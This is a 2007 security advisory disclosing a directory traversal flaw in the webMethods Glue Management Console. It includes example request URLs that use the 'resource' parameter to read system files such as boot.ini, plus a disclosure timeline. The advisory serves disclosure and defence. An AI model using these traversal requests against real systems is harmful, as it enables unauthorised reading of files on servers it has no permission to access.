glue-lfi.txt

`aushack.com - Vulnerability Advisory  
-----------------------------------------------  
Release Date:  
11-Apr-2007  
  
Software:  
webMethods - webMethods Glue Management Console  
http://www.webmethods.com/  
  
"With webMethods Glue developers can easily create SOAP interfaces  
for their existing Java and C/C++ applications, and legacy systems  
can be easily Web service-enabled, allowing reuse. webMethods Glue  
includes a compact, high-performance implementation of important  
standards such as HTTP, Servlets, XML, SOAP, WSDL, and UDDI, and  
interoperates with Microsoft .NET, IBM WebSphere, BEA WebLogic,  
Apache Axis, and other Web service platforms."  
  
Versions affected:  
Glue 6.5.1 and below.  
  
Vulnerability discovered:  
  
Directory Traversal.  
  
Vulnerability impact:  
  
Medium - Read arbitrary system files.  
  
Vulnerability information:  
  
The webMethods Glue Management Console includes HTML pages via  
the /console?resource=console/index.html variable, which is prone  
to a classic traversal attack.  
  
Examples:  
  
http://glueconsole:8080/console?resource=../../../boot.ini  
http://glueconsole:8080/console?resource=\boot.ini  
http://glueconsole:8080/console?resource=c:\boot.ini  
  
Would return the contents of the 'boot.ini' file.  
  
Note that 'c:\boot.ini' is also valid. It may be possible  
(but untested) to traverse other volumes.  
  
References:  
aushack.com advisory  
http://www.aushack.com/advisories/200704-webmethods.txt  
  
Credit:  
Patrick Webster ( [email protected] )  
  
Disclosure timeline:  
20-Mar-2007 - Discovered during quick audit.  
23-Mar-2007 - Vendor notified. No response.  
11-Apr-2007 - Public disclosure.  
  
EOF  
`